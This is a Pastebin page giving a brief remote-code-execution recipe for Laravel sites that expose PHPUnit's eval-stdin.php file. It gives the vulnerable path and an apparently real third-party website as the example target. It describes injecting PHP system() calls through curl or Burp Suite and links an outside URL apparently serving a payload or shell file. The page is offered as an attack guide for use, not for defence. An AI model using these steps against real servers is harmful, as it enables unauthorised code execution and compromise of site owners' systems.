API tools faq
paste
ToKeiChun

Laravel PHPUnit RCE

ToKeiChun
Sep 21st, 2019
583
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.69 KB | None | 0 0
raw download clone embed print report
  1. laravel phpunit rce
  2.  
  3. PROLOG :
  4. [-] bug on vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  5. [-] use curl or burpsute for execute the file vulnerable
  6.  
  7. POC :
  8. [-] access the file vulnerable on site target.
  9. example : http://click.ecc.ac.jp/ecc/fashion_club/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  10. [-] use curl or reload then listening use burpsuite then u can inject the php code there like <?php system(' -ls la'); or etc
  11. [-] if that site vuln, the target react w/ php code that you run.
  12. EPILOG :
  13. [-] when u cant upload file there, u can search dir w/ readeable permission.
  14. [-] or if u can't use wget or curl or etc, u can use this.
  15. https://khunerable.net/images/3x.txt
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!